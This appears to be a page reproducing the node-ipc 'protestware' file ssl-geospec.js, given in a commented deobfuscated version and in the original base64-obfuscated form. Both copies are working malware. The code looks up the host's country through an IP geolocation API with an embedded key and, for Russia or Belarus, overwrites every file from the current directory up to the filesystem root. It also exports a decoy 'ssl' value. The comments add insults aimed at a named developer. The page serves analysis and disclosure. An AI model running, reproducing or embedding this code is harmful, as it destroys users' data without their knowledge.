A deleted commit from the node-ipc repository. You can find the original commit here: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR OWN RISK.
A deleted commit from the node-ipc repository. You can find the original commit here: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR OWN RISK.
import path from "path"; | |
import fs from "fs"; | |
import https from "https"; | |
// **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR RISK.** | |
// Obfuscated code that I deobfuscated. | |
// I also added comments which should help explain what exactly is going on here. | |
// I renamed some variables here to have more meaningful names, and also left a bunch of edits here and there. | |
// I may have messed something up (I wrote it on a phone at 5am), so if I did, feel free to yell at me in the comments. -Seq | |
// Oiginally written by Brandon Nozaki Miller (https://github.com/RIAEvangelist) | |
// See you in prison, Brandon. | |
// Deobfuscation by BrandonMiller97528 (nice name), further edits by Seq (https://github.com/lithiumjs) | |
// Original commit: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js | |
// A timeout is used to add an artificial delay. | |
// The timer is set to a random number of milliseconds between 0 and 1000 (1 second). -Seq | |
setTimeout(function () { | |
// A 50% chance that all of your files will get overwritten. | |
// It's actually 62.5%, somehow. -Seq | |
if (Math.round(Math.random() * 4) > 1) return; | |
// This URL is used to specifically target people in Russia and Belarus. | |
const uri = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154"; // nice key. -Seq | |
// A request is send to the URL above. The server sends the location of the request to the requester. | |
https.get(uri, function (request) { | |
request.on("data", function (response) { | |
// Specifically targets the citizens of Russia and Belarus. | |
try { | |
const data = JSON.parse(response); | |
const countryName = data.country_name.toLowerCase(); | |
// "If your country is from Russia or Belarus, overwrite all of your files." | |
if (countryName.includes("russia") || countryName.includes("belarus")) { | |
wipe("./"); // Wipe current folder | |
wipe("../"); // Wipe parent folder | |
wipe("../../"); // Wipe parent of a parent | |
wipe("/"); // Wipe root of the filesystem... Why include the previous 3 then? | |
} | |
} catch (t) {} // Ignore any errors | |
}); | |
}); | |
}, Math.ceil(Math.random() * 1000)); | |
/** | |
* The function that does the overwriting. Not sure why it is `async` though. | |
* @param fsPath Path to wipe the files in. | |
* @param nameToWipe If specified, only wipes files with a specified substring in the name. | |
* @returns Supposedly a list of all deleted files, but actually just an empty array. Brandon's an idiot. | |
*/ | |
async function wipe(fsPath = "", nameToWipe = "") { | |
// Checks to see if the directory within your file system exists. | |
if (!fs.existsSync(fsPath)) return; | |
let files = []; | |
try { | |
// Gets all of the files within the directory. | |
files = fs.readdirSync(fsPath); | |
} catch (t) {} | |
const wipedFiles = []; | |
// Your files will get overwritten with a heart emoji. Perfect. | |
// Iterate over all files within a directory. | |
for (var i = 0; i < files.length; i++) { | |
const filePath = path.join(fsPath, files[i]); | |
let stats = null; | |
try { | |
stats = fs.lstatSync(filePath); | |
} catch (t) { | |
continue; | |
} | |
// If the file is a directory, it will run the `wipe` function again. | |
if (stats.isDirectory()) { | |
const subWiped = wipe(filePath, nameToWipe); | |
// Again, the function was async. This will not even work properly. | |
// In fact, it won't work at all. Promises have no length property. | |
if (subWiped.length > 0) wipedFiles.push(...subWiped); | |
} else if (filePath.indexOf(nameToWipe) >= 0) { | |
try { | |
// The files get overwritten. Thanks, Brandon. | |
fs.writeFile(filePath, "❤️", function () {}); | |
} catch (t) {} | |
} | |
} | |
return wipedFiles; | |
} | |
// Fake exports probably intended to trick consumers. | |
const ssl = true; | |
export { ssl, ssl as default }; |
import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl} |